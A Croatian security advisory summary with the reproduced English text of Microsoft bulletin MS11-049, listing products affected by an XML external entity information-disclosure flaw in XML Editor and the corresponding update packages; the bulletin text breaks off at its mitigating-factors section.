Microsoft je objavio reviziju sigurnosnog upozorenja vezanog uz programske pakete koji koriste Microsoft XML Editor. Izvorno upozorenje bilo je vezano uz ispravak sigurnosnog nedostatka koji je zlonamjernim korisnicima omogućavao pristup osjetljivim podacima.
| Paket: | Microsoft InfoPath 2010, Microsoft Office InfoPath 2007, Microsoft SQL Server 2005, Microsoft SQL Server 2008, Microsoft Visual Studio 2005, Microsoft Visual Studio 2008, Microsoft Visual Studio 2010 |
| Operacijski sustavi: | Microsoft Windows XP, Microsoft Windows Server 2003, Microsoft Windows Vista, Microsoft Windows Server 2008, Microsoft Windows 7 |
| Problem: | neodgovarajuće rukovanje datotekama |
| Iskorištavanje: | lokalno/udaljeno |
| Posljedica: | otkrivanje osjetljivih informacija |
| Rješenje: | programska zakrpa proizvođača |
| CVE: | CVE-2011-1280 |
| Izvorni ID preporuke: | MS11-049 |
| Izvor: | Microsoft |
| Problem: | |
| Uočen nedostatak posljedica je načina na koji XML Editor obrađuje vanjske entitete unutar Web Service Discovery (.disco) datoteka. Revizija je objavljena radi izmjene liste ranjivih sustava. |
|
| Posljedica: | |
| Zlonamjerni korisnici mogu iskoristiti uočen nedostatak za stjecanje pristupa osjetljivim podacima. |
|
| Rješenje: | |
| Objavljena je nadogradnja koja ispravlja nedostatak te se svim korisnicima savjetuje njena primjena. |
|
Izvorni tekst preporuke
Microsoft Security Bulletin MS11-049 - Important
Vulnerability in the Microsoft XML Editor Could Allow Information Disclosure (2543893)
Published: June 14, 2011 | Updated: June 14, 2011
Version: 1.1
General Information
Executive Summary
This security update resolves a privately reported vulnerability in Microsoft XML Editor. The vulnerability could allow information disclosure if a user opened a specially crafted Web Service Discovery (.disco) file with one of the affected software listed in this bulletin. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to produce information that could be used to try to further compromise the affected system.
This security update is rated Important for all supported editions of Microsoft InfoPath 2007 and Microsoft InfoPath 2010; all supported editions of SQL Server 2005, SQL Server 2008, and SQL Server 2008 R2; and all supported editions of Microsoft Visual Studio 2005, Microsoft Visual Studio 2008, and Microsoft Visual Studio 2010. For more information, see the subsection, Affected and Non-Affected Software, in this section.
The security update addresses the vulnerability by correcting the manner in which the XML Editor resolves external entities within a Web Service Discovery (.disco) file. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.
Recommendation. Microsoft recommends that customers apply the update at the earliest opportunity.
Known Issues. Microsoft Knowledge Base Article 2543893 documents the currently known issues that customers may experience when installing this security update. The article also documents recommended solutions for these issues.
Top of sectionTop of section
Affected and Non-Affected Software
The following software have been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.
Microsoft Office Software
Software Maximum Security Impact Aggregate Severity Rating Bulletins Replaced by this Update
Microsoft InfoPath 2007 Service Pack 2
(KB2510061)
Information Disclosure
Important
MS10-039
Microsoft InfoPath 2010 (32-bit editions)
(KB2510065)
Information Disclosure
Important
None
Microsoft InfoPath 2010 (64-bit editions)
(KB2510065)
Information Disclosure
Important
None
Microsoft SQL Server
GDR Software Updates QFE Software Updates Maximum Security Impact Aggregate Severity Rating Bulletins Replaced by this Update
SQL Server 2005 Service Pack 3
(KB2494113)
SQL Server 2005 Service Pack 3
(KB2494112)
Information Disclosure
Important
MS09-062
SQL Server 2005 x64 Edition Service Pack 3
(KB2494113)
SQL Server 2005 x64 Edition Service Pack 3
(KB2494112)
Information Disclosure
Important
MS09-062
SQL Server 2005 for Itanium-based Systems Service Pack 3
(KB2494113)
SQL Server 2005 for Itanium-based Systems Service Pack 3
(KB2494112)
Information Disclosure
Important
MS09-062
SQL Server 2005 Service Pack 4
(KB2494120)
SQL Server 2005 Service Pack 4
(KB2494123)
Information Disclosure
Important
None
SQL Server 2005 x64 Edition Service Pack 4
(KB2494120)
SQL Server 2005 x64 Edition Service Pack 4
(KB2494123)
Information Disclosure
Important
None
SQL Server 2005 for Itanium-based Systems Service Pack 4
(KB2494120)
SQL Server 2005 for Itanium-based Systems Service Pack 4
(KB2494123)
Information Disclosure
Important
None
SQL Server 2005 Express Edition Service Pack 3
(KB2494113)
SQL Server 2005 Express Edition Service Pack 3
(KB2494112)
Information Disclosure
Important
None
SQL Server 2005 Express Edition Service Pack 4
(KB2494120)
SQL Server 2005 Express Edition Service Pack 4
(KB2494123)
Information Disclosure
Important
None
SQL Server 2005 Express Edition with Advanced Services Service Pack 3
(KB2494113)
SQL Server 2005 Express Edition with Advanced Services Service Pack 3
(KB2494112)
Information Disclosure
Important
None
SQL Server 2005 Express Edition with Advanced Services Service Pack 4
(KB2494120)
SQL Server 2005 Express Edition with Advanced Services Service Pack 4
(KB2494123)
Information Disclosure
Important
None
SQL Server Management Studio Express (SSMSE) 2005
(KB2546869)
Not applicable
Information Disclosure
Important
None
SQL Server Management Studio Express (SSMSE) 2005 x64 Edition
(KB2546869)
Not applicable
Information Disclosure
Important
None
SQL Server 2008 for 32-bit Systems Service Pack 1
(KB2494096)
SQL Server 2008 for 32-bit Systems Service Pack 1
(KB2494100)
Information Disclosure
Important
None
SQL Server 2008 for x64-based Systems Service Pack 1
(KB2494096)
SQL Server 2008 for x64-based Systems Service Pack 1
(KB2494100)
Information Disclosure
Important
None
SQL Server 2008 for Itanium-based Systems Service Pack 1
(KB2494096)
SQL Server 2008 for Itanium-based Systems Service Pack 1
(KB2494100)
Information Disclosure
Important
None
SQL Server 2008 for 32-bit Systems Service Pack 2
(KB2494089)
SQL Server 2008 for 32-bit Systems Service Pack 2
(KB2494094)
Information Disclosure
Important
None
SQL Server 2008 for x64-based Systems Service Pack 2
(KB2494089)
SQL Server 2008 for x64-based Systems Service Pack 2
(KB2494094)
Information Disclosure
Important
None
SQL Server 2008 for Itanium-based Systems Service Pack 2
(KB2494089)
SQL Server 2008 for Itanium-based Systems Service Pack 2
(KB2494094)
Information Disclosure
Important
None
SQL Server 2008 R2 for 32-bit Systems
(KB2494088)
SQL Server 2008 R2 for 32-bit Systems
(KB2494086)
Information Disclosure
Important
None
SQL Server 2008 R2 for x64-based Systems
(KB2494088)
SQL Server 2008 R2 for x64-based Systems
(KB2494086)
Information Disclosure
Important
None
SQL Server 2008 R2 for Itanium-based Systems
(KB2494088)
SQL Server 2008 R2 for Itanium-based Systems
(KB2494086)
Information Disclosure
Important
None
Developer Tools
Software Maximum Security Impact Aggregate Severity Rating Bulletins Replaced by this Update
Microsoft Visual Studio 2005 Service Pack 1
(KB2251481)
Information Disclosure
Important
None
Microsoft Visual Studio 2008 Service Pack 1
(KB2251487)
Information Disclosure
Important
None
Microsoft Visual Studio 2010
(KB2251489)
Information Disclosure
Important
None
Non-Affected Software
Operating System
Microsoft InfoPath 2003 Service Pack 2
Microsoft InfoPath 2003 Service Pack 3
Microsoft SQL Server 2000 Desktop Engine Service Pack 4
Microsoft SQL Server 2000 Itanium Edition Service Pack 4
Microsoft SQL Server 2000 Reporting Services Service Pack 2
Microsoft SQL Server 2000 Service Pack 4
Microsoft Visual Studio .NET 2003 Service Pack 1
Top of sectionTop of section
Frequently Asked Questions (FAQ) Related to This Security Update
There are both GDR and QFE updates offered for my version of SQL. How do I know which update to use?
First, determine your SQL Server version number. For more information on determining your SQL Server version number, see Microsoft Knowledge Base Article 321185.
Second, in the table below, locate the version range that your SQL Server version number falls within. The corresponding update is the update you need to install.
Note If your SQL Server version number does not fall within any of the ranges in the table below, your SQL Server version is no longer supported. Please upgrade to the latest Service Pack or SQL Server product in order to apply this and future security updates.
For SQL Server 2005:
SQL Server Version Range
9.00.4035-9.00.4059
9.00.4205-9.00.4339
9.00.5000-9.00.5056
9.00.5254-9.00.5291
SQL Server Update
SQL Server 2005 Service Pack 3 GDR
(KB2494113)
SQL Server 2005 Service Pack 3 QFE
(KB2494112)
SQL Server 2005 Service Pack 4 GDR
(KB2494120)
SQL Server 2005 Service Pack 4 QFE
(KB2494123)
For SQL Server 2008:
SQL Server Version Range
10.00.2531-10.00.2572
10.00.2710-10.00.2840
10.00.4000-10.00.4063
10.00.4260-10.00.4310
SQL Server Update
SQL Server 2008 Service Pack 1 GDR
(KB2494096)
SQL Server 2008 Service Pack 1 QFE
(KB2494100)
SQL Server 2008 Service Pack 2 GDR
(KB2494089)
SQL Server 2008 Service Pack 2 QFE
(KB2494094)
For SQL Server 2008 R2:
SQL Server Version Range
10.50.1601.1-10.50.1616
10.50.1701-10.50.1789
SQL Server Update
SQL Server 2008 R2 GDR
(KB2494088)
SQL Server 2008 R2 QFE
(KB2494086)
For additional installation instructions, see the Security Update Information subsection for your SQL Server edition in the Update Information section.
Where are the file information details?
Refer to the reference tables in the Security Update Deployment section for the location of the file information details.
I am using an older release of the software discussed in this security bulletin. What should I do?
The affected software listed in this bulletin have been tested to determine which releases are affected. Other releases are past their support life cycle. For more information about the product lifecycle, visit the Microsoft Support Lifecycle Web site.
It should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. To determine the support lifecycle for your software release, see Select a Product for Lifecycle Information. For more information about service packs for these software releases, see Lifecycle Supported Service Packs.
Customers who require custom support for older software must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country in the Contact Information list, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Microsoft Support Lifecycle Policy FAQ.
Top of sectionTop of section
Vulnerability Information
Severity Ratings and Vulnerability Identifiers
The following severity ratings assume the potential maximum impact of the vulnerability. For information regarding the likelihood, within 30 days of this security bulletin's release, of the exploitability of the vulnerability in relation to its severity rating and security impact, please see the Exploitability Index in the June bulletin summary. For more information, see Microsoft Exploitability Index.
Vulnerability Severity Rating and Maximum Security Impact by Affected Software
Affected Software XML External Entities Resolution Vulnerability - CVE-2011-1280 Aggregate Severity Rating
Microsoft InfoPath
Microsoft InfoPath 2007 Service Pack 2
Important
Information Disclosure
Important
Microsoft InfoPath 2010 (32-bit editions)
Important
Information Disclosure
Important
Microsoft InfoPath 2010 (64-bit editions)
Important
Information Disclosure
Important
Microsoft SQL Server
SQL Server 2005 Service Pack 3
Important
Information Disclosure
Important
SQL Server 2005 x64 Edition Service Pack 3
Important
Information Disclosure
Important
SQL Server 2005 for Itanium-based Systems Service Pack 3
Important
Information Disclosure
Important
SQL Server 2005 Service Pack 4
Important
Information Disclosure
Important
SQL Server 2005 x64 Edition Service Pack 4
Important
Information Disclosure
Important
SQL Server 2005 for Itanium-based Systems Service Pack 4
Important
Information Disclosure
Important
SQL Server 2008 for 32-bit Systems Service Pack 1
Important
Information Disclosure
Important
SQL Server 2008 for x64-based Systems Service Pack 1
Important
Information Disclosure
Important
SQL Server 2008 for Itanium-based Systems Service Pack 1
Important
Information Disclosure
Important
SQL Server 2008 for 32-bit Systems Service Pack 2
Important
Information Disclosure
Important
SQL Server 2008 for x64-based Systems Service Pack 2
Important
Information Disclosure
Important
SQL Server 2008 for Itanium-based Systems Service Pack 2
Important
Information Disclosure
Important
SQL Server 2008 R2 for 32-bit Systems
Important
Information Disclosure
Important
SQL Server 2008 R2 for x64-based Systems
Important
Information Disclosure
Important
SQL Server 2008 R2 for Itanium-based Systems
Important
Information Disclosure
Important
SQL Server 2005 Express Edition Service Pack 3
Important
Information Disclosure
Important
SQL Server 2005 Express Edition Service Pack 4
Important
Information Disclosure
Important
SQL Server 2005 Express Edition with Advanced Services Service Pack 3
Important
Information Disclosure
Important
SQL Server 2005 Express Edition with Advanced Services Service Pack 4
Important
Information Disclosure
Important
SQL Server Management Studio Express (SSMSE) 2005
Important
Information Disclosure
Important
SQL Server Management Studio Express (SSMSE) 2005 x64 Edition
Important
Information Disclosure
Important
Microsoft Visual Studio
Microsoft Visual Studio 2005 Service Pack 1
Important
Information Disclosure
Important
Microsoft Visual Studio 2008 Service Pack 1
Important
Information Disclosure
Important
Microsoft Visual Studio 2010
Important
Information Disclosure
Important
Top of sectionTop of section
XML External Entities Resolution Vulnerability - CVE-2011-1280
An information disclosure vulnerability exists in the way that Microsoft XML Editor handles specially crafted XML files.
To view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2011-1280.
Mitigating Factors for XML External Entities Resolution Vulnerability - CVE-2011-1280
Mitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:
â 
Posljednje sigurnosne preporuke